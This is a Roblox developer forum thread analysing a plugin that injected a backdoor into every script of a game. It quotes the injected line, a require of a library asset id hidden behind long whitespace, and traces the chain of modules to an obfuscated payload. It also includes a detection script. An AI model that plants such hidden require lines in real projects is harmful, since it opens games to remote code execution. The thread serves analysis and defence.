Backdoors in games

I personally would post this in discussion but I don’t have the permissions.

Backdoors have been around on Roblox for a few years and are becoming more and more used to break games, insert exploit capabilities, and they're very stealthy too.

I recently have been working on a game only for it to be ruined by a plugin inserting backdoors into every single script in my game. My scripts now have this line of text:

--[[ --]]                                                  pcall(function()require(5045142580):Fire()end)	

So I further looked into this, I got the module and it was just another require.

require(5189613560)

I looked in the library again for this other id, and as predicted, it’s another require

require(5151855975)

I then looked for this other id, and found the model that looks like it would be the main model that would break your game. No, it’s a getfenv. I couldn’t even scroll along; it would lag my Studio, not my computer, so I copied the script into Notepad and it was not lagging. I tried to read what on earth it was but it was just random letters, so I searched “getfenv” and “require”; nothing came up for require, but getfenv, yes.

Whoever writes these backdoors would not write all these random letters; they must be using some form of software to stop anyone from understanding it except your computer. Don’t judge me if I’m wrong, but I’m pretty sure they’re obfuscating their backdoor. At this point I can’t do anything but report the items, which I recommend you all do too.

Links:

  1. https://www.roblox.com//library/5045142580/--
  2. https://www.roblox.com/library/5189613560/--
  3. https://www.roblox.com/library/5151855975/--

I hope this can help explain how some backdoors are really sneaky and can break your game. If I’m wrong anywhere, which I probably am, feel free to correct me and I’ll replace the text.

NOTE: I am not a professional scripter, I just am curious and this is all personal opinion and none of it should be trusted to be a fact.

4 Likes
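
As an added example (not part of the original post and not a Roblox tool): a snippet for the Studio command bar that flags lines shaped like the injected one quoted above, meaning a `require` of a numeric asset id or code pushed behind a long run of whitespace. The function names and the 30-character threshold are assumptions.

```lua
-- Added example (not from the thread). Paste into the Studio command bar.
local MIN_PAD = 30 -- assumed threshold: whitespace run long enough to hide code off-screen

-- Returns a list of reasons why one source line looks injected (empty = nothing found).
local function inspectLine(line)
	local reasons = {}
	-- require(<number>) pulls a ModuleScript from the library by asset id at run time.
	for assetId in string.gmatch(line, "require%s*%(%s*(%d+)%s*%)") do
		table.insert(reasons, "require of asset id " .. assetId)
	end
	-- Code placed after a long run of spaces or tabs sits outside the visible editor area.
	for pad in string.gmatch(line, "([ \t]+)%S") do
		if #pad >= MIN_PAD then
			table.insert(reasons, "code after " .. #pad .. " whitespace characters")
			break
		end
	end
	return reasons
end

-- Walks every script under `root` and collects the flagged lines.
local function scan(root)
	local findings = {}
	for _, inst in ipairs(root:GetDescendants()) do
		if inst:IsA("LuaSourceContainer") then
			-- Source is only readable from plugin/command-bar context, so guard the read.
			local ok, source = pcall(function() return inst.Source end)
			if ok then
				local lineNo = 0
				for line in string.gmatch(source .. "\n", "(.-)\r?\n") do
					lineNo = lineNo + 1
					local reasons = inspectLine(line)
					if #reasons > 0 then
						table.insert(findings, string.format("%s:%d  %s",
							inst:GetFullName(), lineNo, table.concat(reasons, "; ")))
					end
				end
			end
		end
	end
	return findings
end

-- Self-check on a line built like the one in the post (padding reconstructed), then scan the place.
local sample = "--[[ --]]" .. string.rep(" ", 50) .. "pcall(function()require(5045142580):Fire()end)"
assert(#inspectLine(sample) == 2, "sample line should trip both checks")
assert(#inspectLine("local Players = game:GetService('Players')") == 0)
for _, finding in ipairs(scan(game)) do
	warn(finding)
end
```

A hit on `require` by asset id is not proof of a backdoor, since some legitimate loaders use it; each flagged id still has to be checked against modules you added yourself.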

The script is almost impossible to open. Are you able to post it in a pastebin so I can copy-paste it, so I can help you find out what it does more or less?

But if plugins are doing this you should check their source.

You can get a plugin’s source by doing

game:GetObjects("rbxassetid://ID HERE")[1].Parent = workspace

and then inspecting it.

The pastebin reaches the max limit of 500kb. I’ve tried other sites; they have a similar size limit.
However, I’ll upload a .txt file Backdoor.txt (1.1 MB)

This script is so long my notepad is actually unable to open the file, holy. Ended up opening it online. Those random letters by the way are probably just obfuscation, to make the script confusing, hard to inspect, and impossible to back engineer.

It seems that whoever made this is making a reference to getfenv with a really weird name, that way you’re unable to see where it’s being used. They’re also dealing with _ENV? I guess the part of code that obfuscates global functions was copy-pasted from a vanilla Lua source or something.

But really, getfenv isn’t what you should be scared of. Only drawback is disabling Luau’s optimizations I guess, which is not a big deal.

I couldn’t find anything else malicious, no loadstrings, I also couldn’t find the Fire() method they were using. Unless the file you sent was not the first module. In fact, I couldn’t find anything that is causing side-effects, which is really weird.

1 Like

I dumped the constants of the script you uploaded and checked out the module scripts. It’s a backdoor bound to happen (or not? the module scripts probably got overwritten to hide the original code) as the module scripts are still empty. Once the childish person puts code in the module scripts, the code in them will get executed on the server.

Try scrolling along in the modulescripts.

I did. It eventually requires nothing but a truss part, which shouldn’t be possible nor cause any harm to your game. Am I missing something?

The truss part actually has a modulescript with it.

No, it doesn’t.

Try re-inserting the model, and group it.
I’d also not recommend opening the modulescript, it lags a lot.

I still can’t get the module that comes with truss part to show up, but I’ll assume it was the file you uploaded above given you said this:

I mentioned above that I dumped the constants of the script and it seems to be a vm of some sort. It still would probably rely on the module scripts to contain more code to actually run something, but that wouldn’t matter at this point.

Just get rid of the whole thing :man_shrugging:

Yeah, I’ll just get rid of it lol.

1 Like